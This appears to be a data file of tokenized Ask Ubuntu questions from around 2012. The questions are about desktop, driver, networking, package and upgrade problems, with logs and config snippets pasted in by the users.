111539	unity does not start in 3d but only on 2d / unity no inicia en 3d pero si en 2d	unity 3d does not start , only 2d papa @ antonio-ge620-fx620dx : ~ $ unity -- reset-icons unity-panel-service : proceso no encontrado checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done could n't find a perfect decorator match ; trying all decorators found no decorator to start setting update `` main_menu_key '' setting update `` run_key '' setting update `` run_command_terminal_key '' setting update `` fullscreen_visual_bell '' segmentation fault ( core dumped )
111540	is it possible to follow progress of particular package managers ?	i notice that my node.js on the latest ubuntu is only 0.4.12 , but i 'm trying to install something that needs 0.6 . is there a way to see the team who are involved in packaging this ? or track progress ? update : thanks for the answer to my specific node.js issue , it 's very useful . but i really wanted to ask the question that i asked - is there a way to follow the people doing the packaging for ubuntu and to track their progress ? ( the node.js was just an example of why i might want to do this . )
111541	how do i install ubuntu tv on my pc and booth ubuntu and ubuntu tv ?	how do i install ubuntu tv on my pc tv and booth ubuntu and ubuntu tv ?
111542	switching workspace in xubuntu oneiric is slow , how to improve it ?	the processor is a single core amd sempron 1.6 ghz . while it is a few years old , workspace switching under ubuntu lucid / gnome to any workspace was always instant , even when a lot of apps were open . under xubuntu oneiric , switching to an empty workspace is instant , but switching to a workspace with 5 open applications takes 8 to 9 seconds . compiz is not installed . since xfce is said to be more light weight than gnome , switching should be instant too , is n't it ? how can this be improved ?
111544	how can i run an opengl program on a headless server ?	i 'm working on a server application that does image processing ( and in part , using freeglut ) . this application will be deployed on a headless server and when i run it there , i get errors saying that freeglut could n't open a display . i figured this would be an issue , but i 'm not sure how to resolve it . my server is limited in resources , so it would be good if i did n't have to install x11 and run it . any suggestions ?
111546	black screen installing with amd graphics card	when i try to run ubuntu 11.10 on my laptop of a cd ( also happens with wubi ) i get a black screen . when i get the black screen i ca n't do anything except to force shutdown ( by holding the power button ) . i have an amd radeon hd 6000g series card . my laptop : hp pavilion g6
111553	usb ports not working - how do i check for drivers and diagnose problem ?	my usb ports used to work , but have stopped working . i would re-install ubuntu but do not want to do that until i can back up my data which i can not until my usb ports are fixed . how do i check to see if ubuntu is seeing the usb drivers and if it is , how do i diagnose the problem ?
111555	scheduled tasks wo n't start	i am quite new to the world of ubuntu ( 11.04 is my version ) , so please bear with me if i do not give all the necessary details to help you help me . i constantly record radio streaming on the internet using streamripper ; it works wonderfully . to do so , i open scheduled tasks ( in applications / system tools ) and program streamripper to retrieve a certain streaming at a specific time for a certain length of time . yesterday , scheduled tasks bugged while i was adding a few more recording tasks ; suddenly the list went blank , i could not click on `` add new task '' , the software was non-responsive . i shut it down ( by clicking on the x ) . it would not open ever again . i rebooted , i even uninstalled and reinstalled scheduled tasks : nothing worked . all i could do was using crontab -e in terminal ( which works perfectly ) . i learned pretty fast how it worked , but the interface is not very user-friendly and would love to see the scheduled tasks work again . has anyone any clue as to how i could solve this problem ?
111557	gnome shell mouse shortcut to switch workspace	how can i switch workspaces in gnome shell with extra mouse buttons ? i`ve used to do it with compiz in unity and gnome2 , but i can`t bind it in gnome shell . i want use both up/down and extra mouse button on my old logitech mx revolution .
111558	f2 to rename file open terminal	i am running ubuntu 11.10 with gnome-shell 3.2 , and i may have done something wrong ( probably with dconf or gconf ) . but now pressing f2 within nautilus opens a terminal , and shift+f2 do the rename stuff ( but selecting all filename including extension ) . how can i can revert back to default behavior ? thanks in advance .
111560	ati graphics - version doubt	currently i 'm using ubuntu 12.04 ( wich is a blast ! ! ! ) and i 've been working around with the graphics and testing several programs like skype , vlc and others with video.. i 've noticed that there is a bug that does n't allow to run skype has it should . currently i 've noticed that if i disable accelaration video on vlc all works fine ... i 've noticed also that if i disable proprietary graphics all things works very well too . i think it might be a video accelaration bug . so , i want to know wich ati radeon version am i using right now . there 's some command that i can put in terminal and see that ? thnx in advance .
111561	how to add screen-lock password to ubuntu 11.10	could someone please tell me how i can add a password to ubuntu 11.10 screen lock ? for example , after i press ctrl + alt + l and lock , if i were to move my mouse or press a key there would be a prompt for my account password . thanks .
111562	nautilus unable to see other computers on network	i have 3 computers in the lan , 1 server ( ubuntu 11.10 server ) , 2 desktop-pcs ( 1 windows 7 , 1 ubuntu 11.10 desktop ) ... i shared some folders from the server , the windows and the ubuntu pc , but i ca n't see them . neither on windows , nor on the ubuntu desktop , however , i can access them if i enter the computername ( or ip , both works ) . when a friend comes with his windows-laptop and connects to the lan , he can see the shared folders of the windows machine and i can see his shared folders , but we both ca n't see one of the ubuntu-computers and the ubuntu desktop ca n't see any share at all ... is there a way to tell ubuntu , respectively nautilus that it bcasts the network and finds the shares ? i have alrdy installed winbind , wins , samba and configured samba to use wins and added wins to /etc/nsswitch.conf .
111563	lost power during upgrade , how do i recover ?	i was attempting to update my 11.10 install to 12.04beta . during the install step , i accidentally lost power to my laptop ( the power cable came unplugged ) and it shut down . whenever i go to boot now , i can select my install via grub and it loads up to where the sign-in should happen , but i get a display that looks like what you see as soon as you shut down . it looks like it locks after checking for the battery . is there anyway , with or without live media , to restore my machine 's install/update to 12.04 but still keep my settings/applications/files ?
111571	how do i install the older gtk version of the ubuntu one control panel ?	i am using the precise beta and totally hate the new qt based ubuntu one control panel . i would like to switch back to the old , pretty , gtk based control panel , and expect that it would still work . however , i do n't know how to install the old control panel from the oneiric repo without manually installing all dependencies from the ground up . how can i install it without dependency checks ?
111575	how to detect a memory leak system wide ?	i 'm using a ubuntu lucid box at work which just runs for ever ( almost never shut it down ) . since upgrading to lucid i 've noticed that after 2 or 3 weeks w/o rebooting , memory usage becomes huge : ram completely full ( 3gb ) and 6 gb swap . i suspect this is caused by some app ( or driver ) leaking memory , but i have no clue which one it might be , because memory usage increases very slowly . so , i need a program to detect if any process in my system is slowly leaking memory . what i think would do it is a program which takes a daily measurement of the memory usage of each process ( like top or htop ) , and shows me the evolution of that usage over the time . googled for it . found nothing .
111576	how do i get redshift to start with my computer ?	i have installed redshift on my computer , and it works fine with the command gtk-redshift however it wo n't start up automatically when using the same command in startup applications . how do i set it to automatically start ?
111578	emacs-auctex-okular	i have tex live 2011 installed with emacs 23 . auctex and okular . i have also configured emacs/auctex to work with okular supporting forward and inverse search . but . here 's my question . if i have emacs and okular docked side by side and when i click on okular , the cursor is taken to emacs . but . if i have okular and emacs in two maximized windows , and when i click okular , the emacs window is not brought up to the front . have i configured synctex correctly or is this how it is supposed to work ?
111579	how to have the hud search all resources ?	on the 12.04 beta , if you click on the alt key , hud appears and on bottom of the screen you have four icons . there 's an arrow pointing down onto the home icon by default . if you start typing you can only see what 's available within that resource . if you wanted to search for videos you have to click on the video icon and then type in your query . is there a way to have it search all resources ? i 'd like to be less mouse dependent . when you do get results , is there a way to assign a number to the results ? i can move the cursor down and once i 've highlighted it hit enter but assigning a number would get to the result faster .
111580	how do i use the gui to search for files in gnome ?	on the command line i regularly use locate , or more often a locate x | grep y pattern to find a file i know exists but ca n't find ! i 'd like something that did this quickly in the gui . ca n't find it if it 's there . here 's my confusion in the applications/overview i can see search and indexing . this seems to be a configuration tool . but if this is a server , i ca n't find a client . in applications i find nepomuk file indexing -- i think this is a kde thing ? ditto , no client ? i 've installed tracker . this is a strange mix of powerful and unreliable/limited . e.g . it does n't find files like locate does ( returns no results where locate returns 96 results ) , but is will unpack every tag i 've added to my photos ! and you ca n't limit by folder for a quick search within a folder . the old gnome 2 search for files ... thing is not in the accessories menu anymore . i feel that this is basic/core-level functionality and i ca n't help feeling i 'm missing something obvious .
111583	wireless network connection dialog keeps popping up	this is a network i once tried to connect to by mistake in the past . now every few minutes the connect window keeps popping up and it is really annoying . how can i solve this ? thanks and please move this to the appropriate forum if that 's not here .
111584	bluetooth not working	i have ubuntu 11.10 in my new hp pavilion g6 laptop , my wireless is working and my bluetooth not working either , it shows adaptor is on but its not finding any devices or any devices can not find my laptop .
111585	how do i remove a broken software source ?	i accidentally added this in a terminal : sudo wget http : //www.medibuntu.org/sources.list.d/gutsy.list -0 /etc/apt/sources.list.d/medibuntu.list after which i get this error : e : not known on line 1 file /etc/apt/sources.list.d/medibuntu.list e : could not read source list etc ... etc ... i saw that you already 'solved a similar problem ... can you help me original ( italian ) : gestore pacchetti bloccato ho inserito per sbaglio questo comando nel terminale : sudo wget http : //www.medibuntu.org/sources.list.d/gutsy.list -0 /etc/apt/sources.list.d/medibuntu.list dopodiche si e'bloccato gestione pacchetto e ricevo questo errore : e : non riconosciuto alla riga 1nel file /etc/apt/sources.list.d/medibuntu.list e : impossibile leggere elenco sorgenti etc ... etc ... ho visto che hai gia ' risolto un problema simile ... mi puoi aiutare
111588	xlib glx not working ubuntu 11.10	i upgraded to ubuntu 11.10 and now i can not run google earth or other applications that require glx . here is what i got when i ran unity_support_test . how do i fix this ? aurora @ eurus : ~ $ /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . segmentation fault i am using a dell inspiron n5110 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 )
111590	how does gnome 3 execute commands that are bound to keyboard shortcuts ?	can someone explain how gnome 3 executes commands that are bound to keyboard shortcuts ? i 'm asking because all commands that i 've bound execute only after double pressing . i 've checked it with : modkey + f1 - > chromium modkey + f2 - > ~/ownbashscript here are my log 's lines that are appended while i 'm double-pressing modkey + f1 : windows manager warning : log level 16 : fetch_connections_done : error fetching connections : ( 25 ) launch helper exited with unknown return code 1 . windows manager warning : log level 16 : nm_client_get_devices : error getting devices : launch helper exited with unknown return code 1 full log can be found here .
111592	how do i set the default gnome terminal ?	i want to change default terminal to lilyterm . here is instructions that i 've found on the internet gsettings set org.gnome.desktop.default-applications.terminal exec lilyterm gsettings set org.gnome.desktop.default-applications.terminal exec-arg `` '' but when i 'm pressing shotcut , that must run default termial -- i 'm getting windows manager warning : error on terminal command '' ( null ) '' . terminal command is not defined . where i 've made a mistake ?
111593	different multi-monitor setups	on my work laptop , i 'm looking for a way to choose which monitor setup is attached ( before login , or in grub ) at work i have a vertical 2208 dell monitor , and at home i have u2711 ( horizontal ) and sometimes i use the laptop `` standalone '' . i can set the monitors up no problem , but it 's annoying to have to do it every time . i would also like this configuration to include different wallpapers . currently running maverick , but will upgrade to 12.04 . currently using xinerama and i have a nvidia nvs 3100m is there a way to configure xorg for this , or is there an application i can install for this ?
111595	why is n't tor working ?	i installed tor & polipo via the software center . i followed instructions found at this question ( but since the config file was 404 , i used a config from tor + polipo 5 minute install guide ubuntu 11.10 ) . tor & polipo are working properly . i set my network to manual proxy & added the 127.0.0.1:8118 for all but socks ( which is 9050 ) . those are the ports set in the polipo config file . still , neither google chrome nor firefox are using tor when i browse . i expected to have this working in 5 minutes but it 's been over an hour . i 'm very confused -- what am i missing ? ? ?
111597	how can i work around `` something wicked happened resolving '' mirror errors ?	i see the following being queried all over . but do n't see any answers or did i miss them ? seems to be a strange use of language . something wicked happened . is this a form of malware ? how do i get the update manager to move on ? w : failed to fetch http : //za.archive.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-bin_2.11.1-0ubuntu7.10_i386.deb something wicked happened resolving 'za.archive.ubuntu.com : http ' ( -5 - no address associated with hostname )
111599	multiple internet icons in the launcher bar	after a reinstall of ubuntu 11.10 , i have this bug ( i think ) . what happens is i start the internet , then i keep the icon ( cromium webbrowser ) in the launcher bar . after some time on the internet with some links and new pages i close up and realize that there is more than one cromium webbrowser icon in the menubar . all the pages has been closed , and theese iรงons all have `` keep in launcher '' checked . is there a setting that i have missed or is it something else ? youtube movies also seem to be in a different java , since the player is different and never plays smoothly , it may be an update that i need to do , but firefox is doing exactly the same thing , and there is no updates available in the update manager . java.com says that my java is n't up to date , but i cant find out how to update it then ... anyone got an idea ?
111626	libreoffice have global menu in 12.04 ?	in 11.10 there was no global menu support for libreoffice , i wanted to know if this was going to be fixed in 12.04 ? ( i just saw a youtube video of beta which still shows no global menu in libreoffice ) if not , what are the difficulties in its inclusion ? ( has n't there has been a ppa of lo-menubar for a while ... )
111633	have purple screen with word ubuntu	i installed the new version of ubuntu . it restarted and now the only thing that shows is a purple screen with the word ubuntu in the middle of it . wont do anything . its just stuck on this screen .
111636	how to remove nautilus side bar on some instances	i want to remove sidebar from nautilus , but not all the time , what i want is to remove it on a certain instance . the problem is when i remove it on an instance , it 's removed from all other instances . in other words : i want to customize nautilus 's sidebar for a specific folders . how to do that ?
111641	how do i set up a network bridge ?	i have a wireless connection through my laptop that i am attempting to bridge through an ethernet cable to my xbox . so far i have not found anything online that explains how to do this . can anyone help me out ?
111643	no graphics available for optiplex 755	i 've had 11.10 and 12.04 installed on my optiplex 755 - however i 've never had the driver installed , it doesnt seem to be available . is there anyway i can get a to a higher resolution than 1024 x 768 ? i 've asked on irc a few times with no answer .
111645	what 's the best way to re-enable ppa's/repos after an upgrade ?	when i upgrade from 11.10 to 12.04 whats the best way to re-enable my ppa 's and added repos ?
111654	synchronize sshfs mount with local filesystem	i 've got a directory called `` secure '' that i mount on my laptop via sshfs whenever the server is in reach . while this server is in reach i want to keep it in two-way sync with a directory called `` sync '' . the `` secure '' directory is mounted with pam_mount at login and unmounted at logout . i have setup pam_script to create a symbolic link to `` sync '' when the mount fails and to remove the link on unmount . in my first attempt was to run unison with pam_script : # ! /bin/bash # pam_script_ses_open ( runs at the start of a session ) home=`eval echo ~ $ pam_user` secure= $ home/secure sync= $ home/sync if mount|grep `` $ secure '' ; then echo synchronizing with server $ sync : $ secure unison `` file : // $ sync '' `` file : // $ secure '' else ln -s `` $ sync '' `` $ secure '' fi and for end of session : # ! /bin/bash userid= $ pam_user home=`eval echo ~ $ userid` secure= $ home/secure sync= $ home/sync if mount|grep `` $ secure '' ; then echo synchronizing with server unison `` file : // $ sync '' `` file : // $ secure '' else rm `` $ secure '' fi both these scripts run under root . at logout the two directories synchronize just fine . at login however i get the following error message : synchronizing with server /home/users/user/sync : /home/users/user/secure contacting server ... fatal error : wrong number of roots : 2 expected , but 4 provided ( ssh : //user @ server/ , /home/users/user , file : ///home/users/user/secure , file : ///home/users/user/sync ) ( maybe you specified roots both on the command line and in the profile ? ) i have verified that no `` .unison '' directory exists in any users home directory and did apt-get purge unison followed by an apt-get install unison . i am not entirely happy about using unison in this way ( even if it did work ) because it would only synchronize at login and logout . it would not be a live synchronization . how can i get sshfs or fstab to start a live synchronization whenever the directory is mounted or if that is not possible , why is unison failing in my current setup ? i am looking for a clean and robust solution .
111655	pxe boot server stalling with `` file not found '' error	i 'm trying to setup my ubuntu 10.04 server to allow pxe booting for the clients in my lab . i have configured the dhcp settings and everything , and i boot up my client , and it sits at a screen similar to the following : client mac addr : 00 01 80 5f 9a 79 guid : 00000000 0000 0000 0000 000000000001 client ip : 192.168.0.128 mask : 255.255.255.0 dhcp ip : 192.168.0.100 gateway ip : 192.168.0.100 _ before , i was getting the wonderful `` pxe- t01 file not found '' error , but now it just stalls . i checked the syslog on my server , and it gives me the following info : dhcpd : dhcpdiscover from 00:01:80:5f:9a:79 via eth1 dhcpd : dhcpoffer on 192.168.0.128 to 00:01:80:5f:9a:79 via eth1 dhcpd : dhcprequest for 192.168.0.128 ( 192.168.0.100 ) from 00:01:80:5f:9a:79 via eth1 dhcpd : dhcpack on 192.168.0.128 to 00:01:80:5f:9a:79 via eth1 in.tftpd [ 2371 ] : tftp : client does not accept options not quite sure what is going on here . i looked up the whole `` client does not accept options '' , however most places i find say to ignore it . i still have the problem of stalling , however . here is my dhcpd.conf file : ddns-update-style none ; authoritative ; allow booting ; allow bootp ; option domain-name-servers 208.67.222.222 , 208.67.220.220 ; default-lease-time 600 ; max-lease-time 7200 ; log-facility local7 ; subnet 192.168.0.0 netmask 255.255.255.0 { range 192.168.0.1 192.168.0.254 option domain-name-servers 208.67.222.222 ; option routers 192.168.0.100 ; option broadcast-address 192.168.0.255 ; option subnet-mask 255.255.255.0 ; default-lease-time 600 ; max-lease-time 7200 ; next-server 192.168.0.100 ; filename `` pxelinux.0 '' ; } i have been using this tutorial , by the way : http : //www.serenux.com/2010/05/howto-setup-your-own-pxe-boot-server-using-ubuntu-server/ if there is anymore information i can provide that could be of assistance , please inform me and i will provide it . thank you in advance for all of your help
111664	how to denied downloading a specific file	i installed ubuntu 11.10 in my uncle 's pc and since then he has downloaded ashampoo 149 times . i do not know why he has downloaded that 149 times and tried to install it 149 times the thing is , that file is about 150mb . he downloads that file about 2-3 times a day and it is getting very annoying when anyone wants to use the shared internet connection . i want to denied the download of this file . if i can in one or any of the following ways : actually denied the download of that file from that specific url link . denied any download from that site , the ashampoo site in this case . denied the download of any file that has the name ashampoo in it .
111665	ftp client for ubuntu that allows drag'n'drop ?	can someone recommend me an ftp client that will allow me to perform drag and drop operations onto my desktop or other folders on my system straight from the ftp client that 's connected to a server ? does one even exist ? i 've tried filezilla on windows before , and it allowed me to do so . installed filezilla on ubuntu , attempted to drag and drop , and it did not work . is there some setting i need to modify , or is there another ftp client that can do so ? any suggestions ? this would really make everything faster for me .
111667	tools to monitor ubuntu server ?	i am looking for web-based tools to monitor ubuntu server ( disk space , ram , etc ) + apache2 + asterisk ( optional )
111669	hibernate missing from power menu and when i press laptop power button	when i upgraded from 11.10 to 12.04 my ubuntu power menu has lost the ability to hibernate . is there a way to add that back in , or is this default for 12.04 ?
111673	partition problem	i was hoping to install ubuntu first day of me getting my laptop but this partition problem stopped me from doing so . in the first boot it asked if i wanted to partition my hard drives . did n't know what to do at the time and had to leave so i shut off the computer . when i booted it back up later that night i found i had 3 hard drives . c : is 50gb , system f : 100mb and temp_part01 d : 524.90gb . my laptop has 6gb of ram i believe . i did a system recovery that came with the laptop hoping it 'll boot into partition program made by samsung on the first boot like it did the first time . could use some help . been banging my head trying to figure this out .
111678	how to rip dvd 's in high quality	i am currently backing up ( ripping ) my dvd collection onto my server harddrive , to allow streaming throughout my house . i am using acidrip to do the ripping . my problem is that the quality video of the rip is not as good as i would like , and the file size is a little too big . i downloaded an .avi rip of the blu-ray movie `` black hawk down '' the other day , and the quality was very good . i believe it was a 720p rip . but the file size was only 700mb . when i rip regular dvd 's i choose a high bitrate ( around.22 ) but my file sizes are anywhere from 1000mb to 1200mb , and the quality is nowhere near as good . how can i use acid rip to rip a high quality video at a 700mb file size ? is there better software , or is there something i 'm missing in acidrip ?
111680	how to resolve unmet dependencies error ?	using my new install of ubuntu i have n't been able to download anything from the software center except the maryo game without the following error : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 1.1.12-2~oneiric1 ) but 1.1.12-2~oneiric1 is to be installed depends : libaa1 ( > = 1.4p5 ) but 1.4p5-38build1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.7-1 ) but 4:0.7.3ubuntu0.11.10.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7-1 ) but 4:0.7.3ubuntu0.11.10.1 is to be installed depends : libc6 ( > = 2.8 ) but 2.13-20ubuntu5.1 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.4-2ubuntu1.1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.1-9ubuntu3 is to be installed depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but 4:4.7.4-0ubuntu8.1 is to be installed depends : libqtgui4 ( > = 4:4.5.3 ) but 4:4.7.4-0ubuntu8.1 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but 1.2.10-2.1 is to be installed depends : libsdl1.2debian ( > = 1.2.10-1 ) but 1.2.14-6.1ubuntu4 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.1-9ubuntu3 is to be installed depends : libva-x11-1 ( > 1.0.12~ ) but it is not going to be installed depends : libva1 ( > 1.0.12~ ) but it is not going to be installed depends : libxcb-randr0 ( > = 1.1 ) but it is not going to be installed depends : libxcb-xv0 ( > = 1.2 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu3 is to be installed my system specs are version 11.10 64 bit . ge-g41m-es2l mother board amd 5770 video card wdc green 500 gig hard drive i have recently changed the motherboard , but otherwise have not changed my computer from when i used to be running the same version of ubuntu . edit still unable to download output of sudo apt-get update output of sudo apt-get update ~ $ sudo apt-get update ign http : //extras.ubuntu.com oneiric inrelease ign http : //security.ubuntu.com oneiric-security inrelease ign http : //archive.canonical.com oneiric inrelease ign http : //ppa.launchpad.net oneiric inrelease ign http : //us.archive.ubuntu.com oneiric inrelease ign http : //us.archive.ubuntu.com oneiric-updates inrelease ign http : //us.archive.ubuntu.com oneiric-backports inrelease hit http : //extras.ubuntu.com oneiric release.gpg hit http : //archive.canonical.com oneiric release.gpg hit http : //security.ubuntu.com oneiric-security release.gpg hit http : //ppa.launchpad.net oneiric release.gpg ign http : //us.archive.ubuntu.com oneiric-proposed inrelease hit http : //us.archive.ubuntu.com oneiric release.gpg hit http : //extras.ubuntu.com oneiric release hit http : //archive.canonical.com oneiric release hit http : //security.ubuntu.com oneiric-security release hit http : //ppa.launchpad.net oneiric release hit http : //us.archive.ubuntu.com oneiric-updates release.gpg hit http : //us.archive.ubuntu.com oneiric-backports release.gpg hit http : //extras.ubuntu.com oneiric/main sources hit http : //archive.canonical.com oneiric/partner i386 packages hit http : //security.ubuntu.com oneiric-security/main sources hit http : //ppa.launchpad.net oneiric/main sources hit http : //us.archive.ubuntu.com oneiric-proposed release.gpg hit http : //extras.ubuntu.com oneiric/main i386 packages ign http : //extras.ubuntu.com oneiric/main translationindex hit http : //ppa.launchpad.net oneiric/main i386 packages ign http : //ppa.launchpad.net oneiric/main translationindex ign http : //archive.canonical.com oneiric/partner translationindex hit http : //security.ubuntu.com oneiric-security/restricted sources hit http : //security.ubuntu.com oneiric-security/universe sources hit http : //security.ubuntu.com oneiric-security/multiverse sources hit http : //security.ubuntu.com oneiric-security/main i386 packages hit http : //security.ubuntu.com oneiric-security/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric release hit http : //us.archive.ubuntu.com oneiric-updates release hit http : //security.ubuntu.com oneiric-security/universe i386 packages hit http : //security.ubuntu.com oneiric-security/multiverse i386 packages hit http : //security.ubuntu.com oneiric-security/main translationindex hit http : //security.ubuntu.com oneiric-security/multiverse translationindex hit http : //security.ubuntu.com oneiric-security/restricted translationindex hit http : //security.ubuntu.com oneiric-security/universe translationindex hit http : //us.archive.ubuntu.com oneiric-backports release hit http : //security.ubuntu.com oneiric-security/main translation-en hit http : //security.ubuntu.com oneiric-security/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric-proposed release hit http : //us.archive.ubuntu.com oneiric/main sources hit http : //us.archive.ubuntu.com oneiric/restricted sources hit http : //us.archive.ubuntu.com oneiric/universe sources hit http : //us.archive.ubuntu.com oneiric/multiverse sources hit http : //security.ubuntu.com oneiric-security/restricted translation-en hit http : //us.archive.ubuntu.com oneiric/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric/universe i386 packages hit http : //us.archive.ubuntu.com oneiric/multiverse i386 packages hit http : //us.archive.ubuntu.com oneiric/main translationindex hit http : //us.archive.ubuntu.com oneiric/multiverse translationindex hit http : //us.archive.ubuntu.com oneiric/restricted translationindex hit http : //us.archive.ubuntu.com oneiric/universe translationindex hit http : //us.archive.ubuntu.com oneiric-updates/main sources hit http : //us.archive.ubuntu.com oneiric-updates/restricted sources hit http : //security.ubuntu.com oneiric-security/universe translation-en hit http : //us.archive.ubuntu.com oneiric-updates/universe sources hit http : //us.archive.ubuntu.com oneiric-updates/multiverse sources hit http : //us.archive.ubuntu.com oneiric-updates/main i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/universe i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/multiverse i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/main translationindex hit http : //us.archive.ubuntu.com oneiric-updates/multiverse translationindex hit http : //us.archive.ubuntu.com oneiric-updates/restricted translationindex hit http : //us.archive.ubuntu.com oneiric-updates/universe translationindex hit http : //us.archive.ubuntu.com oneiric-backports/main sources hit http : //us.archive.ubuntu.com oneiric-backports/restricted sources hit http : //us.archive.ubuntu.com oneiric-backports/universe sources hit http : //us.archive.ubuntu.com oneiric-backports/multiverse sources hit http : //us.archive.ubuntu.com oneiric-backports/main i386 packages hit http : //us.archive.ubuntu.com oneiric-backports/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric-backports/universe i386 packages hit http : //us.archive.ubuntu.com oneiric-backports/multiverse i386 packages hit http : //us.archive.ubuntu.com oneiric-backports/main translationindex hit http : //us.archive.ubuntu.com oneiric-backports/multiverse translationindex hit http : //us.archive.ubuntu.com oneiric-backports/restricted translationindex hit http : //us.archive.ubuntu.com oneiric-backports/universe translationindex ign http : //extras.ubuntu.com oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en_us hit http : //us.archive.ubuntu.com oneiric-proposed/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric-proposed/main i386 packages hit http : //us.archive.ubuntu.com oneiric-proposed/multiverse i386 packages hit http : //us.archive.ubuntu.com oneiric-proposed/universe i386 packages hit http : //us.archive.ubuntu.com oneiric-proposed/main translationindex hit http : //us.archive.ubuntu.com oneiric-proposed/multiverse translationindex hit http : //us.archive.ubuntu.com oneiric-proposed/restricted translationindex hit http : //us.archive.ubuntu.com oneiric-proposed/universe translationindex ign http : //archive.canonical.com oneiric/partner translation-en_us ign http : //extras.ubuntu.com oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //archive.canonical.com oneiric/partner translation-en get:1 http : //us.archive.ubuntu.com oneiric/main i386 packages [ 1,583 kb ] hit http : //us.archive.ubuntu.com oneiric/main translation-en hit http : //us.archive.ubuntu.com oneiric/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric/restricted translation-en hit http : //us.archive.ubuntu.com oneiric/universe translation-en hit http : //us.archive.ubuntu.com oneiric-updates/main translation-en hit http : //us.archive.ubuntu.com oneiric-updates/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric-updates/restricted translation-en hit http : //us.archive.ubuntu.com oneiric-updates/universe translation-en hit http : //us.archive.ubuntu.com oneiric-backports/main translation-en hit http : //us.archive.ubuntu.com oneiric-backports/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric-backports/restricted translation-en hit http : //us.archive.ubuntu.com oneiric-backports/universe translation-en hit http : //us.archive.ubuntu.com oneiric-proposed/main translation-en hit http : //us.archive.ubuntu.com oneiric-proposed/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric-proposed/restricted translation-en hit http : //us.archive.ubuntu.com oneiric-proposed/universe translation-en err http : //us.archive.ubuntu.com oneiric/main i386 packages 404 not found [ ip : 91.189.92.179 80 ] fetched 1 b in 2s ( 0 b/s ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found [ ip : 91.189.92.179 80 ] e : some index files failed to download . they have been ignored , or old ones used instead .
111685	why usb hardwares are shown wrong in windows 7 32bit installed in virtualbox in the ubuntu 1110 64bit	i install windows 7 32bit in the virtual box on my 64 bit ubuntu . windows 7 can see my usb devices but it always show usb hardware wrong . i plug my usb disk in , can not work . i plug my usb printer in , can not work . how to overcome it ? thanks
111686	no opengl in 11.10 / gui wo n't start with nvidia	i 've got a dell d630 that i 've been running with ubuntu 11.04 and i recently decided to do a web upgrade to 11.10 . after the upgrade blender would n't start . i did some investigating and discovered that opengl would n't start . first i tried sudo nvidia-xconfig to no avail . i did an installation of the current nvidia driver from the command line thus : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current having done this i rebooted and discovered that the gui would n't start - it just hung at the first screen . i logged in and tried starting it but only got some errors logged such as this one : [ 36.090 ] ( ii ) nvidia ( gpu-0 ) : display ( lpl ( dfp-0 ) ) does not support nvidia 3d vision doing some more research i discovered that in 11.10 the nvidia driver was replaced by nouveau which is evidently incomplete ( no 3d ) . i discovered that i if i booted 2.6.38-13 the system would start up properly with opengl . with that i did some more digging and decided that perhaps i should disable noveau . i found these instructions on-line : you have to disable nouveau driver ( which i think is the default driver of ubuntu ) . first , you have to edit the modprobe blacklist file ( terminal : gksu gedit /etc/modprobe.d/blacklist.conf ) and add these entries at the bottom : blacklist vga16fb blacklist nouveau blacklist rivafb blacklist nvidiafb blacklist rivatv then reboot and they shouldn’t be loaded . next , open the terminal and type ”sudo update-initramfs -u” to create a new image and reboot before nouveau is actually removed . so far no luck . i 'm running 11.10 with the 2.6.38-13 kernel . what should i try next ? if i 'd realized it would be this much trouble i would have never done the upgrade .
111687	lost power while upgrading to 12.04 , how do i fix the botched install ?	i was upgrading from 11.10 to 12.04 just for kicks and lost power to the pc while it was about 3/4 done with the install section of the upgrade . i can login successfully and launch apps from the terminal ( posting this from the comp ) . the main thing i 'm missing is the launcher dock and the notification bar at the top . since i am able to easily access the terminal , i 've tried apt-get dist-upgrade , apt-get upgrade , and dpkg -- configure -a . all of which do nothing . is there anything i can do to fix the install aside from downloading the iso and going off that .
